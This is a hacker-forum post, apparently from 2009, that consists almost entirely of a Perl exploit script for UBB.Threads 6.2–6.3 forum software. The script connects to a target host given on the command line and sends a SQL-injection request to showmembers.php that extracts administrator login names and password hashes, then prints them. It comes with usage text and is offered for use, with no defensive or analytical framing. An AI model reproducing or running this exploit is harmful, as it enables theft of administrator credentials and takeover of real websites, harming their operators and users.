06:02
Обновить
UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing - Форум
| RSS



[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: aka_kludge, LeadyTOR  
UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing
aka_kludgeДата: Четверг, 29.10.2009, 22:24 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Code
#!/usr/bin/perl
use IO::Socket;

########################################
## UBBThreads exploit for admin hash viewing ##
## SQL-injection ##
## coded by ziGGy and Satyr ##
## Bugs found by w00t
##Gr33t1ngz to:Khmelic;Skr4tch;Mazafaka.ru;d.o.b familia;4nd 3v3ry b0dy wh0 kn0w$ u$##
##$0rry f0r 7t1$ 31337 $p34k1ng =P##
## http://www.cyberlords.net ##
########################################

if (@ARGV < 2)
{
print "#############################################################\n";
print " UBB.Threads 6.2.*-6.3.* exploit for admin hash viewing\n";
print " coded by ziGGy and Satyr\n";
print " Cyber Lords Community http://www.cyberlords.net\n";
print "#############################################################\n";
print " Usage:\n";
print " cl_ubb.pl <host> </folder/> \n";
print "\n";
print " <host> - host for attacking\n";
print " </folder/> - UBBThreads folder\n";
print "#############################################################\n";
exit();
}
$server = $ARGV[0];
$folder = $ARGV[1];
print "\n";
print "server : $server\n";
print "folder : $folder\n";
print "\n";
$success = 0;
$path_download=
"showmembers.php?Cat=&like=1'%20union%20SELECT%20U_LoginName,U_Registered,U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_Number%20FROM%20w3t_Users%20WHERE%20U_Status ='Administrator'/*";
$GET = $folder . $path_download;
print " Connecting...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") ||
die "Connection died\n";
print "Connected!\n";
print "Sending...\n";
print $socket "GET $GET HTTP/1.1\n";
print $socket "Host: $server\n";
#print $socket "Accept: */*\n";
print $socket "Http-Referer: http://microsoft.com\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "Success!\n";
print "Hold on...\n\n";

$start=0;
$href_num=0;
$next_str_name=0;
$all_count=0;
while ($answer = <$socket>)
{

     if($next_str_name eq 1){print $answer;$next_str_name=0;}
     if($answer=~/CODE LOOP/gi){$start=1;}
     if($answer=~/END OF LOOP/gi){$start=0;break;}

     if($start eq 1){
         if($answer=~/<a href/){
             $href_num++;
             if($href_num % 2 eq 0){
                 $answer=~s/http:\/\///gi;
                 $answer=~/<a href="(.+)" target="new">/gi;
                 print $1."\n\n";$all_count++;
             }
             else{
                 $next_str_name=1;
             }
         }
     }

}
if ($all_count == 0) { print "exploit failed!!!\n"; }

 
  • Страница 1 из 1
  • 1
Поиск:

Профиль
ИнформацияУправление
Сегодня: 22, 22.12.2024, 06:02
Вы используете: " v "
ВаШ внешний IP: "18.117.72.24"
У вас новых личных сообщений · Мой профиль | Выход




    Главная      
...
На службе : дней

06:02
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск


Copyright tHR - TeAM 2024 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика